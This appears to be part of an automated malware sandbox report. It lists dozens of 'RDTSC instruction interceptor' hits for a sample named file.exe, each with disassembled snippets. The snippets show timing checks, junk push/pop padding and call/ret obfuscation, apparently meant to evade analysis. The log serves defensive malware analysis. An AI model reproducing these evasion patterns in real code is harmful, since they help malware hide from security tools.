          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851A8D second address: 851A9D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE1C8D9686Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8520B8 second address: 8520D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FE1C8D8FEB6h 0x0000000c popad 0x0000000d jmp 00007FE1C8D8FEBFh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8523B4 second address: 8523BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8523BF second address: 8523C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8523C9 second address: 8523CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8523CE second address: 8523E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE1C8D8FEBAh 0x00000008 jg 00007FE1C8D8FEC2h 0x0000000e jnl 00007FE1C8D8FEB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816817 second address: 816822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816822 second address: 816828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858276 second address: 85827A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85827A second address: 85827E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85827E second address: 8582AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1C8D96872h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE1C8D9686Ch 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 push edx 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8582AF second address: 8582BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007FE1C8D8FEB6h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 825583 second address: 825595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE1C8D9686Ah 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BC4E second address: 85BC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85EFE9 second address: 85EFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85E454 second address: 85E468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE1C8D8FEB6h 0x0000000a je 00007FE1C8D8FEB6h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85E468 second address: 85E4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE1C8D96872h 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FE1C8D96870h 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push edi 0x00000018 jnl 00007FE1C8D96866h 0x0000001e pop edi 0x0000001f pushad 0x00000020 jmp 00007FE1C8D96879h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85E641 second address: 85E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85EB62 second address: 85EB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862825 second address: 86282F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862912 second address: 862916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862916 second address: 86291A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862AAD second address: 862AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862B48 second address: 862B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862EFA second address: 862EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FA4 second address: 862FCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov dword ptr [ebp+1244C5FFh], ecx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE1C8D8FEC3h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 862FCA second address: 862FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863127 second address: 86312B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86312B second address: 863131 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863131 second address: 86313C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FE1C8D8FEB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86313C second address: 863149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863149 second address: 86314D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8632FF second address: 863322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE1C8D96876h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863322 second address: 86332F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FE1C8D8FEBCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86350D second address: 863567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FE1C8D9686Eh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FE1C8D96868h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov si, A4A9h 0x0000002a call 00007FE1C8D96873h 0x0000002f mov dword ptr [ebp+122D1793h], edx 0x00000035 pop edi 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863567 second address: 86356B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86356B second address: 863596 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE1C8D9686Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE1C8D96873h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864245 second address: 86424A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86686C second address: 8668D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007FE1C8D96866h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FE1C8D96868h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f add esi, 67901749h 0x00000035 push 00000000h 0x00000037 add dword ptr [ebp+1244983Ah], edx 0x0000003d xchg eax, ebx 0x0000003e push ebx 0x0000003f push edi 0x00000040 jmp 00007FE1C8D9686Eh 0x00000045 pop edi 0x00000046 pop ebx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FE1C8D96870h 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D0E second address: 868D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D12 second address: 868D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007FE1C8D96866h 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D24 second address: 868D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D2A second address: 868D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007FE1C8D9686Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE1C8D9686Ah 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D4B second address: 868D5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007FE1C8D8FEB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D5D second address: 868D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D61 second address: 868D6B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE1C8D8FEB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819D04 second address: 819D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819D08 second address: 819D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819D12 second address: 819D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 819D16 second address: 819D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869D92 second address: 869DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jc 00007FE1C8D96868h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869DB1 second address: 869E30 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FE1C8D8FEB8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D33B4h] 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FE1C8D8FEB8h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 push 00000000h 0x0000004a jmp 00007FE1C8D8FEC0h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FE1C8D8FEC4h 0x00000057 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869E30 second address: 869E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FE1C8D96866h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B2D6 second address: 86B2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B2DA second address: 86B2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B2DE second address: 86B2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE1C8D8FEC0h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B865 second address: 86B8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FE1C8D96868h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jmp 00007FE1C8D9686Eh 0x00000027 push 00000000h 0x00000029 xor dword ptr [ebp+122D1820h], ecx 0x0000002f push 00000000h 0x00000031 mov bx, 732Eh 0x00000035 mov ebx, 504C6700h 0x0000003a push eax 0x0000003b jnl 00007FE1C8D9686Eh 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86C84C second address: 86C85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FE1C8D8FEB8h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D927 second address: 86D92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D92B second address: 86D93A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FE1C8D8FEB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D93A second address: 86D94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007FE1C8D9686Ah 0x0000000f pop esi 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A639 second address: 86A63F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8F2 second address: 86F8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B99A second address: 86B9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F8F8 second address: 86F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B9A8 second address: 86B9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CA5F second address: 86CA77 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1C8D96866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE1C8D9686Ah 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86B9AC second address: 86B9B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CA77 second address: 86CA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF33 second address: 86FF39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CA7D second address: 86CA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FF39 second address: 86FF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870FCB second address: 870FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FE1C8D96866h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87116A second address: 87116E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 873F8B second address: 87401D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FE1C8D96868h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov bh, 91h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FE1C8D96868h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007FE1C8D96868h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 0000001Dh 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+122D34DCh] 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FE1C8D96872h 0x0000006b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87401D second address: 874022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874022 second address: 874028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8722C8 second address: 8722CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8722CC second address: 8722DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D9686Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8722DD second address: 8722E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8722E3 second address: 8722E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8741B8 second address: 8741BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8741BC second address: 8741C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8770D0 second address: 8770F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FE1C8D8FEC0h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8770F4 second address: 8770F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8770F8 second address: 87717A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE1C8D8FEB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov di, cx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FE1C8D8FEB8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jmp 00007FE1C8D8FEBEh 0x00000032 xchg eax, esi 0x00000033 push ebx 0x00000034 jmp 00007FE1C8D8FEC2h 0x00000039 pop ebx 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007FE1C8D8FEC4h 0x00000043 jmp 00007FE1C8D8FEC1h 0x00000048 popad 0x00000049 rdtsc
